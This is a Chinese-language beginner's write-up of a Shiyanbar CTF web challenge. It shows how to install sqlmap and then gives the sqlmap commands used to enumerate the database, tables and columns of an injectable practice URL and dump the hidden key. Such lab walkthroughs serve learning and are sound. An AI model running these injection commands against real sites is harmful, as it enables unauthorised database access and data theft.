实验吧ctf题库:这个看起来有点简单!

       查看这道题先登陆“实验吧”,地址为 http://www.shiyanbar.com/ctf/33 。

       这是一道十分基础的web题目,因为我也是刚刚接触ctf,记录一下第一道题的解题过程,算是自己的一个回顾吧,同时也给一些想要入门的朋友一点点微弱的参考吧。

一、sqlmap的安装

       在windows下安装sqlmap需要先下载适用windows的sqlmap版本和python。

       sqlmap的下载地址为:https://github.com/sqlmapproject/sqlmap/tarball/master

       python下载地址为:https://www.python.org/。我的python用的是2.7版本。

      安装好python后, 在python文件目录下新建一个sqlmap文件夹。sqlmap的压缩包解压后能得到下图文件夹,将里面的内容复制到新建的文件夹sqlmap下面。

                         


  实验吧ctf题库:这个看起来有点简单!_第1张图片

 

       在sqlmap目录下打开cmd,输入python  sqlmap.py --version 测试是否安装成功。

       

      如果结果为上图,说明安装成功。

二、使用sqlmap解题

      首先cmd到之前的sqlmap目录下,输入python sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" --current-db 。引号内是存在注入点的网址。

      运行后,得到数据库名称 my_db

      实验吧ctf题库:这个看起来有点简单!_第2张图片

      然后查看一下表,输入python sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db --tables。

     实验吧ctf题库:这个看起来有点简单!_第3张图片

  发现有一个thiskey表,猜测需要的信息就藏在thiskey中,于是输入python sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey --columns。

      实验吧ctf题库:这个看起来有点简单!_第4张图片

      得到一个txt类型的k0y,然后再dump出来就完事了。

      输入python sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey -C k0y --dump

      实验吧ctf题库:这个看起来有点简单!_第5张图片

      得到k0y的值。


      



你可能感兴趣的:(实验吧ctf题库:这个看起来有点简单!)